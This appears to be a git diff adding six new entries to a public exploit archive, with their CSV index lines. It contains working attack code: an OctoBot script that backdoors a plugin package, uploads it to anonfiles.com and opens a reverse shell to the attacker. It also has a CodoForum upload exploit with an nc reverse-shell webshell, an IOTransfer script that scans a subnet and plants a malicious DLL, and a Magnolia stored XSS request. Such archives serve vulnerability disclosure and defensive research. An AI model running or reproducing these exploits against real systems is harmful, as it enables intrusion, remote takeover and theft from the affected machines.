diff --git a/exploits/multiple/webapps/50979.py b/exploits/multiple/webapps/50979.py new file mode 100755 index 000000000..9a9c040e0 --- /dev/null +++ b/exploits/multiple/webapps/50979.py @@ -0,0 +1,208 @@ +# Exploit Title: OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE) +# Date: 9/2/2021 +# Exploit Author: Samy Younsi, Thomas Knudsen +# Vendor Homepage: https://www.octobot.online/ +# Software Link: https://github.com/Drakkar-Software/OctoBot +# Version: 0.4.0beta3 - 0.4.3 +# Tested on: Linux (Ubuntu, CentOs) +# CVE : CVE-2021-36711 + +from __future__ import print_function, unicode_literals +from bs4 import BeautifulSoup +import argparse +import requests +import zipfile +import time +import sys +import os + +def banner(): + sashimiLogo = """ + _________ . . + (.. \_ , |\ /| + \ O \ /| \ \/ / + \______ \/ | \ / + vvvv\ \ | / | + _ _ _ _ \^^^^ == \_/ | + | | __ _ | || |__ (_)_ __ ___ (_)`\_ === \. | +/ __)/ _` / __| '_ \| | '_ ` _ \| |/ /\_ \ / | +\__ | (_| \__ | | | | | | | | | | ||/ \_ \| / +( /\__,_( |_| |_|_|_| |_| |_|_| \________/ + |_| |_| \033[1;91mOctoBot Killer\033[1;m +Author: \033[1;92mNaqwada\033[1;m +RuptureFarm 1029 + + FOR EDUCATIONAL PURPOSE ONLY. + """ + return print('\033[1;94m{}\033[1;m'.format(sashimiLogo)) + + +def help(): + print('[!] \033[1;93mUsage: \033[1;m') + print('[-] python3 {} --RHOST \033[1;92mTARGET_IP\033[1;m --RPORT \033[1;92mTARGET_PORT\033[1;m --LHOST \033[1;92mYOUR_IP\033[1;m --LPORT \033[1;92mYOUR_PORT\033[1;m'.format(sys.argv[0])) + print('[-] \033[1;93mNote*\033[1;m If you are using a hostname instead of an IP address please remove http:// or https:// and try again.') + + +def getOctobotVersion(RHOST, RPORT): + if RPORT == 443: + url = 'https://{}:{}/api/version'.format(RHOST, RPORT) + else: + url = 'http://{}:{}/api/version'.format(RHOST, RPORT) + return curl(url) + + +def restartOctobot(RHOST, RPORT): + if RPORT == 443: + url = 'https://{}:{}/commands/restart'.format(RHOST, RPORT) + else: + url = 'http://{}:{}/commands/restart'.format(RHOST, RPORT) + + try: + requests.get(url, allow_redirects=False, verify=False, timeout=1) + except requests.exceptions.ConnectionError as e: + print('[+] \033[1;92mOctoBot is restarting ... Please wait 30 seconds.\033[1;m') + time.sleep(30) + + +def downloadTentaclePackage(octobotVersion): + print('[+] \033[1;92mStart downloading Tentacle package for OctoBot {}.\033[1;m'.format(octobotVersion)) + url = 'https://static.octobot.online/tentacles/officials/packages/full/base/{}/any_platform.zip'.format(octobotVersion) + result = requests.get(url, stream=True) + with open('{}.zip'.format(octobotVersion), 'wb') as fd: + for chunk in result.iter_content(chunk_size=128): + fd.write(chunk) + print('[+] \033[1;92mDownload completed!\033[1;m') + + +def unzipTentaclePackage(octobotVersion): + zip = zipfile.ZipFile('{}.zip'.format(octobotVersion)) + zip.extractall('quests') + os.remove('{}.zip'.format(octobotVersion)) + print('[+] \033[1;92mTentacle package has been extracted.\033[1;m') + + +def craftBackdoor(octobotVersion): + print('[+] \033[1;92mCrafting backdoor for Octobot Tentacle Package {}...\033[1;m'.format(octobotVersion)) + path = 'quests/reference_tentacles/Services/Interfaces/web_interface/api/' + injectInitFile(path) + injectMetadataFile(path) + print('[+] \033[1;92mSashimi malicious Tentacle Package for OctoBot {} created!\033[1;m'.format(octobotVersion)) + + +def injectMetadataFile(path): + with open('{}metadata.py'.format(path),'r') as metadataFile: + content = metadataFile.read() + addPayload = content.replace('import json', ''.join('import json\nimport flask\nimport sys, socket, os, pty')) + addPayload = addPayload.replace('@api.api.route("/announcements")', ''.join('@api.api.route("/sashimi")\ndef sashimi():\n\ts = socket.socket()\n\ts.connect((flask.request.args.get("LHOST"), int(flask.request.args.get("LPORT"))))\n\t[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]\n\tpty.spawn("/bin/sh")\n\n\n@api.api.route("/announcements")')) + with open('{}metadata.py'.format(path),'w') as newMetadataFile: + newMetadataFile.write(addPayload) + + +def injectInitFile(path): + with open('{}__init__.py'.format(path),'r') as initFile: + content = initFile.read() + addPayload = content.replace('announcements,', ''.join('announcements,\n\tsashimi,')) + addPayload = addPayload.replace('"announcements",', ''.join('"announcements",\n\t"sashimi",')) + with open('{}__init__.py'.format(path),'w') as newInitFile: + newInitFile.write(addPayload) + + +def rePackTentaclePackage(): + print('[+] \033[1;92mRepacking Tentacle package.\033[1;m') + with zipfile.ZipFile('any_platform.zip', mode='w') as zipf: + len_dir_path = len('quests') + for root, _, files in os.walk('quests'): + for file in files: + file_path = os.path.join(root, file) + zipf.write(file_path, file_path[len_dir_path:]) + + +def uploadMaliciousTentacle(): + print('[+] \033[1;92mUploading Sashimi malicious Tentacle .ZIP package on anonfiles.com" link="https://app.recordedfuture.com/live/sc/entity/idn:anonfiles.com" style="">anonfiles.com... May take a minute.\033[1;m') + + file = { + 'file': open('any_platform.zip', 'rb'), + } + response = requests.post('https://api.anonfiles.com/upload', files=file, timeout=60) + zipLink = response.json()['data']['file']['url']['full'] + response = requests.get(zipLink, timeout=60) + soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser') + zipLink = soup.find(id='download-url').get('href') + print('[+] \033[1;92mSashimi malicious Tentacle has been successfully uploaded. {}\033[1;m'.format(zipLink)) + return zipLink + +def curl(url): + response = requests.get(url, allow_redirects=False, verify=False, timeout=60) + return response + + +def injectBackdoor(RHOST, RPORT, zipLink): + print('[+] \033[1;92mInjecting Sashimi malicious Tentacle packages in Ocotobot... May take a minute.\033[1;m') + if RPORT == 443: + url = 'https://{}:{}/advanced/tentacle_packages?update_type=add_package'.format(RHOST, RPORT) + else: + url = 'http://{}:{}/advanced/tentacle_packages?update_type=add_package'.format(RHOST, RPORT) + + headers = { + 'Content-Type': 'application/json', + 'X-Requested-With': 'XMLHttpRequest', + } + + data = '{"'+zipLink+'":"register_and_install"}' + + response = requests.post(url, headers=headers, data=data) + response = response.content.decode('utf-8').replace('"', '').strip() + + os.remove('any_platform.zip') + + if response != 'Tentacles installed': + print('[!] \033[1;91mError: Something went wrong while trying to install the malicious Tentacle package.\033[1;m') + exit() + print('[+] \033[1;92mSashimi malicious Tentacle package has been successfully installed on the OctoBot target.\033[1;m') + + +def execReverseShell(RHOST, RPORT, LHOST, LPORT): + print('[+] \033[1;92mExecuting reverse shell on {}:{}.\033[1;m'.format(LHOST, LPORT)) + if RPORT == 443: + url = 'https://{}:{}/api/sashimi?LHOST={}&LPORT={}'.format(RHOST, RPORT, LHOST, LPORT) + else: + url = 'http://{}:{}/api/sashimi?LHOST={}&LPORT={}'.format(RHOST, RPORT, LHOST, LPORT) + return curl(url) + +def isPassword(RHOST, RPORT): + if RPORT == 443: + url = 'https://{}:{}'.format(RHOST, RPORT) + else: + url = 'http://{}:{}'.format(RHOST, RPORT) + return curl(url) + +def main(): + banner() + args = parser.parse_args() + + if isPassword(args.RHOST, args.RPORT).status_code != 200: + print('[!] \033[1;91mError: This Octobot Platform seems to be protected with a password!\033[1;m') + + octobotVersion = getOctobotVersion(args.RHOST, args.RPORT).content.decode('utf-8').replace('"','').replace('OctoBot ','') + + if len(octobotVersion) > 0: + print('[+] \033[1;92mPlatform OctoBot {} detected.\033[1;m'.format(octobotVersion)) + + downloadTentaclePackage(octobotVersion) + unzipTentaclePackage(octobotVersion) + craftBackdoor(octobotVersion) + rePackTentaclePackage() + zipLink = uploadMaliciousTentacle() + injectBackdoor(args.RHOST, args.RPORT, zipLink) + restartOctobot(args.RHOST, args.RPORT) + execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT) + + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description='POC script that exploits the Tentacles upload functionalities on OctoBot. A vulnerability has been found and can execute a reverse shell by crafting a malicious packet. Version affected from 0.4.0b3 to 0.4.0b10 so far.', add_help=False) + parser.add_argument('-h', '--help', help=help()) + parser.add_argument('--RHOST', help="Refers to the IP of the target machine.", type=str, required=True) + parser.add_argument('--RPORT', help="Refers to the open port of the target machine.", type=int, required=True) + parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True) + parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True) + main() \ No newline at end of file diff --git a/exploits/php/webapps/50976.txt b/exploits/php/webapps/50976.txt new file mode 100644 index 000000000..807ecfd73 --- /dev/null +++ b/exploits/php/webapps/50976.txt @@ -0,0 +1,43 @@ +# Exploit Title: Magnolia CMS 6.2.19 - Stored Cross-Site Scripting (XSS) +# Date: 08/05/2022 +# Exploit Author: Giulio Garzia 'Ozozuz' +# Vendor Homepage: https://www.magnolia-cms.com/ +# Software Link: https://nexus.magnolia-cms.com/service/local/repositories/magnolia.public.releases/content/info/magnolia/bundle/magnolia-community-demo-webapp/6.2.19/magnolia-community-demo-webapp-6.2.19-tomcat-bundle.zip +# Version: 6.2.19 +# Tested on: Linux, Windows, Docker +# CVE : CVE-2022-33098 + +Explanation +Malicious user with the permissions to upload profile picture for a contact, can upload an SVG file containing malicious JavaScript code that will be executed by anyone opening the malicious resource. + +===== REQUEST ===== +POST /magnoliaAuthor/.magnolia/admincentral/APP/UPLOAD/0/140/action/cba61868-b27a-4d50-983d-adf48b992be1 HTTP/1.1 +Host: 127.0.0.1:8080 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------399178799522967017241464837908 +Content-Length: 620 +Connection: close +Cookie: csrf=_WLVhBj-Vv-sdc37C4GBahMJ1tPS_7o_Y1VCEEw18Ks; JSESSIONID=F2678A586264F811C2746E4138BEF34D +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: iframe +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin + +-----------------------------399178799522967017241464837908 +Content-Disposition: form-data; name="140_file"; filename="xss.svg" +Content-Type: image/svg+xml + + + + + + + + + +-----------------------------399178799522967017241464837908-- \ No newline at end of file diff --git a/exploits/php/webapps/50978.py b/exploits/php/webapps/50978.py new file mode 100755 index 000000000..58b356602 --- /dev/null +++ b/exploits/php/webapps/50978.py @@ -0,0 +1,89 @@ +# Exploit Title: CodoForum v5.1 - Remote Code Execution (RCE) +# Date: 06/07/2022 +# Exploit Author: Krish Pandey (@vikaran101) +# Vendor Homepage: https://codoforum.com/ +# Software Link: https://bitbucket.org/evnix/codoforum_downloads/downloads/codoforum.v.5.1.zip +# Version: CodoForum v5.1 +# Tested on: Ubuntu 20.04 +# CVE: CVE-2022-31854 + +#!/usr/bin/python3 + +import requests +import time +import optparse +import random +import string + +banner = """ + ______ _______ ____ ___ ____ ____ _____ _ ___ ____ _ _ + / ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ // |( _ ) ___|| || | +| | \ \ / /| _| _____ __) | | | |__) | __) |____ |_ \| |/ _ \___ \| || |_ +| |___ \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) | | (_) |__) |__ _| + \____| \_/ |_____| |_____|\___/_____|_____| |____/|_|\___/____/ |_| +""" + +print("\nCODOFORUM V5.1 ARBITRARY FILE UPLOAD TO RCE(Authenticated)") +print(banner) +print("\nExploit found and written by: @vikaran101\n") + +parser = optparse.OptionParser() +parser.add_option('-t', '--target-url', action="store", dest='target', help='path of the CodoForum v5.1 install') +parser.add_option('-u', '--username', action="store", dest='username', help='admin username') +parser.add_option('-p', '--password', action="store", dest='password', help='admin password') +parser.add_option('-i', '--listener-ip', action="store", dest='ip', help='listener address') +parser.add_option('-n', '--port', action="store", dest='port', help='listener port number') + +options, args = parser.parse_args() + +proxy = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'} + +if not options.target or not options.username or not options.password or not options.ip or not options.port: + print("[-] Missing arguments!") + print("[*] Example usage: ./exploit.py -t [target url] -u [username] -p [password] -i [listener ip] -n [listener port]") + print("[*] Help menu: ./exploit.py -h OR ./exploit.py --help") + exit() + +loginURL = options.target + '/admin/?page=login' +globalSettings = options.target + '/admin/index.php?page=config' +payloadURL = options.target + '/sites/default/assets/img/attachments/' + +session = requests.Session() + +randomFileName = ''.join((random.choice(string.ascii_lowercase) for x in range(10))) + +def getPHPSESSID(): + + try: + get_PHPID = session.get(loginURL) + headerDict = get_PHPID.headers + cookies = headerDict['Set-Cookie'].split(';')[0].split('=')[1] + return cookies + except: + exit() + +phpID = getPHPSESSID() + +def login(): + send_cookies = {'cf':'0'} + send_headers = {'Host': loginURL.split('/')[2], 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language':'en-US,en;q=0.5','Accept-Encoding':'gzip, deflate','Content-Type':'multipart/form-data; boundary=---------------------------2838079316671520531167093219','Content-Length':'295','Origin':loginURL.split('/')[2],'Connection':'close','Referer':loginURL,'Upgrade-Insecure-Requests':'1'} + send_creds = "-----------------------------2838079316671520531167093219\nContent-Disposition: form-data; name=\"username\"\n\nadmin\n-----------------------------2838079316671520531167093219\nContent-Disposition: form-data; name=\"password\"\n\nadmin\n-----------------------------2838079316671520531167093219--" + auth = session.post(loginURL, headers=send_headers, cookies=send_cookies, data=send_creds, proxies=proxy) + + if "CODOFORUM | Dashboard" in auth.text: + print("[+] Login successful") + +def uploadAndExploit(): + send_cookies = {'cf':'0', 'user_id':'1', 'PHPSESSID':phpID} + send_headers = {'Content-Type':'multipart/form-data; boundary=---------------------------7450086019562444223451102689'} + send_payload = '\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="site_title"\n\nCODOLOGIC\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="site_description"\n\ncodoforum - Enhancing your forum experience with next generation technology!\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="admin_email"\n\nadmin@codologic.com\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="default_timezone"\n\nEurope/London\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="register_pass_min"\n\n8\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_all_topics"\n\n30\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_cat_topics"\n\n20\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_per_topic"\n\n20\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_path"\n\nassets/img/attachments\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_exts"\n\njpg,jpeg,png,gif,pjpeg,bmp,txt\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_size"\n\n3\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_mimetypes"\n\nimage/*,text/plain\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_tags_num"\n\n5\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_tags_len"\n\n15\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="reply_min_chars"\n\n10\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="insert_oembed_videos"\n\nyes\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_privacy"\n\neveryone\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="approval_notify_mails"\n\n\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_header_menu"\n\nsite_title\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_logo"; filename="' + randomFileName + '.php"\nContent-Type: application/x-php\n\n&1|nc ' + options.ip + ' ' + options.port + ' >/tmp/f");?> \n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="login_by"\n\nUSERNAME\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="force_https"\n\nno\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="user_redirect_after_login"\n\ntopics\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="sidebar_hide_topic_messages"\n\noff\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="sidebar_infinite_scrolling"\n\non\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="show_sticky_topics_without_permission"\n\nno\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="CSRF_token"\n\n23cc3019cadb6891ebd896ae9bde3d95\n-----------------------------7450086019562444223451102689--\n' + exploit = requests.post(globalSettings, headers=send_headers, cookies=send_cookies, data=send_payload, proxies=proxy) + + print("[*] Checking webshell status and executing...") + payloadExec = session.get(payloadURL + randomFileName + '.php', proxies=proxy) + if payloadExec.status_code == 200: + print("[+] Payload uploaded successfully and executed, check listener") + else: + print("[-] Something went wrong, please try uploading the shell manually(admin panel > global settings > change forum logo > upload and access from " + payloadURL +"[file.php])") +login() +uploadAndExploit() \ No newline at end of file diff --git a/exploits/windows/local/50975.txt b/exploits/windows/local/50975.txt new file mode 100644 index 000000000..fe4e76520 --- /dev/null +++ b/exploits/windows/local/50975.txt @@ -0,0 +1,22 @@ +# Exploit Title: Kite 1.2021.610.0 - Unquoted Service Path +# Date: 2020-11-6 +# Exploit Author: Ghaleb Al-otaibi +# Vendor Homepage: https://www.kite.com/ +# Version: Version 4.2.0.1 U1 +# Tested on: Microsoft Windows 10 Pro - 10.0.19044 N/A Build 19044 +# CVE : NA + +# Service info: +C:\Windows\system32\cmd.exe>sc qc KiteService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: KiteService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 0 IGNORE + BINARY_PATH_NAME : C:\Program Files\Kite\KiteService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : KiteService + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/50977.txt b/exploits/windows/local/50977.txt new file mode 100644 index 000000000..88fc85649 --- /dev/null +++ b/exploits/windows/local/50977.txt @@ -0,0 +1,48 @@ +# Exploit Title: Dr. Fone v4.0.8- 'net_updater32.exe' Unquoted Service Path +# Discovery Date: 2022-05-07 +# Discovery by: Esant1490 +# Vendor Homepage: https://drfone.wondershare.net +# Software Link : https://download.wondershare.net/drfone_full4008.exe +# Tested Version: 4.0.8 +# Tested on OS: Windows 10 Pro x64 en +# Vulnerability Type: Unquoted Service Path + +# Find the discover Unquoted Service Path Vulnerability: + +C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" +|findstr /i /v "C:\Windows\\" |findstr /i /v """ + +Wondershare Install Assist Service Wondershare InstallAssist +C:\ProgramData\Wondershare\Service\InstallAssistService.exe Auto + +Wondershare Application Framework Service WsAppService C:\Program Files +(x86)\Wondershare\WAF\2.4.3.243\WsAppService.exe Auto +Wondershare Application Update Service 3.0 + +WsAppService3 C:\Program Files +(x86)\Wondershare\WAF3\3.0.0.308\WsAppService3.exe Auto + +Wondershare Driver Install Service WsDrvInst C:\Program Files +(x86)\Wondershare\drfone\Addins\Unlock\DriverInstall.exe Auto + +# Service info: + +C:\>sc qc WsDrvInst +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: WsDrvInst +TIPO : 10 WIN32_OWN_PROCESS +TIPO_INICIO : 2 AUTO_START +CONTROL_ERROR : 1 NORMAL +NOMBRE_RUTA_BINARIO: C:\Program Files +(x86)\Wondershare\drfone\Addins\Unlock\DriverInstall.exe +GRUPO_ORDEN_CARGA : +ETIQUETA : 0 +NOMBRE_MOSTRAR : Wondershare Driver Install Service +DEPENDENCIAS : RPCSS +NOMBRE_INICIO_SERVICIO: LocalSystem + +#Exploit: + +A successful attempt to exploit this vulnerability could allow to execute +code during startup or reboot with the elevated privileges. \ No newline at end of file diff --git a/exploits/windows/remote/50974.py b/exploits/windows/remote/50974.py new file mode 100755 index 000000000..728ffc1b0 --- /dev/null +++ b/exploits/windows/remote/50974.py @@ -0,0 +1,190 @@ +# Exploit Title: IOTransfer V4 – Remote Code Execution (RCE) +# Date: 06/22/2022 +# Exploit Author: Tomer Peled +# Vendor Homepage: https://www.iobit.com +# Software Link: https://iotransfer.itopvpn.com/ +# Version: V4 and onward +# Tested on: Windows 10 +# CVE : 2022-24562 +# References: https://github.com/tomerpeled92/CVE/tree/main/CVE-2022%E2%80%9324562 + +import os +from urllib3.exceptions import ConnectTimeoutError +from win32com.client import * +import requests +import json + +localPayloadPath = r"c:\temp\malicious.dll" +remotePayloadPath="../Program Files (x86)/Google/Update/goopdate.dll" +remoteDownloadPath = r'C:\Users\User\Desktop\obligationservlet.pdf' +Range = "192.168.89" +UpOrDown="Upload" +IP = "" +UserName = "" + +def get_version_number(file_path): + information_parser = Dispatch("Scripting.FileSystemObject") + version = information_parser.GetFileVersion(file_path) + return version + + +def getTaskList(IP, taskid=""): + print("Getting task list...") + url = f'http://{IP}:7193/index.php?action=gettasklist&userid=*' + res = requests.get(url) + tasks = json.loads(res.content) + tasks = json.loads(tasks['content']) + for task in tasks['tasks']: + if taskid == task['taskid']: + print(f"Task ID found: {taskid}") + + +def CreateUploadTask(IP): + SetSavePath(IP) + url = f'http://{IP}:7193/index.php?action=createtask' + task = { + 'method': 'get', + 'version': '1', + 'userid': '*', + 'taskstate': '0', + } + res = requests.post(url, json=task) + task = json.loads(res.content) + task = json.loads(task['content']) + taskid = task['taskid'] + print(f"[*] TaskID: {taskid}") + return taskid + + +def CreateUploadDetailNode(IP, taskid, remotePath, size='100'): + url = f'http://{IP}:7193/index.php?action=settaskdetailbyindex&userid=*&taskid={taskid}&index=0' + file_info = { + 'size': size, + 'savefilename': remotePath, + 'name': remotePath, + 'fullpath': r'c:\windows\system32\calc.exe', + 'md5': 'md5md5md5md5md5', + 'filetype': '3', + } + res = requests.post(url, json=file_info) + js = json.loads(res.content) + print(f"[V] Create Detail returned: {js['code']}") + + +def readFile(Path): + file = open(Path, "rb") + byte = file.read(1) + next = "Start" + while next != b'': + byte = byte + file.read(1023) + next = file.read(1) + if next != b'': + byte = byte + next + file.close() + return byte + + +def CallUpload(IP, taskid, localPayloadPath): + url = f'http://{IP}:7193/index.php?action=newuploadfile&userid=*&taskid={taskid}&index=0' + send_data = readFile(localPayloadPath) + try: + res = requests.post(url, data=send_data) + js = json.loads(res.content) + if js['code'] == 200: + print("[V] Success payload uploaded!") + else: + print(f"CreateRemoteFile: {res.content}") + except: + print("[*] Reusing the task...") + res = requests.post(url, data=send_data) + js = json.loads(res.content) + if js['code'] == 200 or "false" in js['error']: + print("[V] Success payload uploaded!") + else: + print(f"[X] CreateRemoteFile Failed: {res.content}") + + +def SetSavePath(IP): + url = f'http://{IP}:7193/index.php?action=setiotconfig' + config = { + 'tasksavepath': 'C:\\Program ' + } + requests.post(url, json=config) + +def ExploitUpload(IP,payloadPath,rPath,taskid =None): + if not taskid: + taskid = CreateUploadTask(IP) + size = os.path.getsize(payloadPath) + CreateUploadDetailNode(IP, taskid, remotePath=rPath, size=str(size)) + CallUpload(IP, taskid, payloadPath) + + +def CreateDownloadTask(IP, Path) -> str: + url = f'http://{IP}:7193/index.php?action=createtask' + task = { + 'method': 'get', + 'version': '1', + 'userid': '*', + 'taskstate': '0', + 'filepath': Path + } + res = requests.post(url, json=task) + task = json.loads(res.content) + task = json.loads(task['content']) + taskid = task['taskid'] + print(f"TaskID: {taskid}") + return taskid + + +def ExploitDownload(IP, DownloadPath, ID=None): + if ID: + url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={ID}' + else: + taskid = CreateDownloadTask(IP, DownloadPath) + url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={taskid}' + res = requests.get(url) + return res + +def ScanIP(startRange): + print("[*] Searching for vulnerable IPs", end='') + Current = 142 + IP = f"{startRange}.{Current}" + VulnerableIP: str = "" + UserName: str = "" + while Current < 252: + print(".", end='') + url = f'http://{IP}:7193/index.php?action=getpcname&userid=*' + try: + res = requests.get(url, timeout=1) + js = json.loads(res.content) + js2 = json.loads(js['content']) + UserName = js2['name'] + VulnerableIP=IP + print(f"\n[V] Found a Vulnerable IP: {VulnerableIP}") + print(f"[!] Vulnerable PC username: {UserName}") + return VulnerableIP,UserName + except Exception as e: + pass + except ConnectTimeoutError: + pass + IP = f"{startRange}.{Current}" + Current = Current + 1 + return None,None + + +if __name__ == '__main__': + IP,UserName = ScanIP(Range) + if IP is None or UserName is None: + print("[X] No vulnerable IP found") + exit() + print("[*] Starting Exploit...") + if UpOrDown == "Upload": + print(f"[*]Local Payload Path: {localPayloadPath}") + print(f"[*]Remote Upload Path: {remotePayloadPath}") + ExploitUpload(IP,localPayloadPath,remotePayloadPath) + elif UpOrDown == "Download": + print(f"[*] Downloading the file: {remoteDownloadPath}") + res = ExploitDownload(IP, remoteDownloadPath) + file = open("out.pdf", "wb+") + file.write(res.content) + file.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index d3325a88f..e9500bdaf 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11489,6 +11489,8 @@ id,file,description,date,author,type,platform,port 50953,exploits/windows/local/50953.txt,"Real Player v.20.0.8.310 G2 Control - 'DoGoToURL()' Remote Code Execution (RCE)",1970-01-01,"Eduardo Braun Prado",local,windows, 50954,exploits/windows/local/50954.txt,"Real Player 16.0.3.51 - 'external::Import()' Directory Traversal to Remote Code Execution (RCE)",1970-01-01,"Eduardo Braun Prado",local,windows, 50959,exploits/windows/local/50959.txt,"HP LaserJet Professional M1210 MFP Series Receive Fax Service - Unquoted Service Path",1970-01-01,"Ali Alipour",local,windows, +50975,exploits/windows/local/50975.txt,"Kite 1.2021.610.0 - Unquoted Service Path",1970-01-01,"Ghaleb Al-otaibi",local,windows, +50977,exploits/windows/local/50977.txt,"Dr. Fone 4.0.8 - 'net_updater32.exe' Unquoted Service Path",1970-01-01,Esant1490,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 @@ -18712,6 +18714,7 @@ id,file,description,date,author,type,platform,port 50964,exploits/multiple/remote/50964.py,"Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)",1970-01-01,Altelus,remote,multiple, 50972,exploits/windows/remote/50972.py,"WiFi Mouse 1.7.8.5 - Remote Code Execution(v2)",1970-01-01,RedHatAugust,remote,windows, 50973,exploits/multiple/remote/50973.py,"Nginx 1.20.0 - Denial of Service (DOS)",1970-01-01,"Mohammed Alshehri",remote,multiple, +50974,exploits/windows/remote/50974.py,"IOTransfer 4.0 - Remote Code Execution (RCE)",1970-01-01,"Tomer Peled",remote,windows, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php, @@ -45036,3 +45039,6 @@ id,file,description,date,author,type,platform,port 50969,exploits/php/webapps/50969.txt,"WordPress Plugin Weblizar 8.9 - Backdoor",1970-01-01,"Sobhan Mahmoodi",webapps,php, 50970,exploits/php/webapps/50970.py,"WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS)",1970-01-01,cxosmo,webapps,php, 50971,exploits/multiple/webapps/50971.txt,"Mailhog 1.0.1 - Stored Cross-Site Scripting (XSS)",1970-01-01,Vulnz,webapps,multiple, +50976,exploits/php/webapps/50976.txt,"Magnolia CMS 6.2.19 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Giulio Garzia Ozozuz",webapps,php, +50978,exploits/php/webapps/50978.py,"CodoForum v5.1 - Remote Code Execution (RCE)",1970-01-01,"Krish Pandey",webapps,php, +50979,exploits/multiple/webapps/50979.py,"OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE)",1970-01-01,"Thomas Knudsen",webapps,multiple,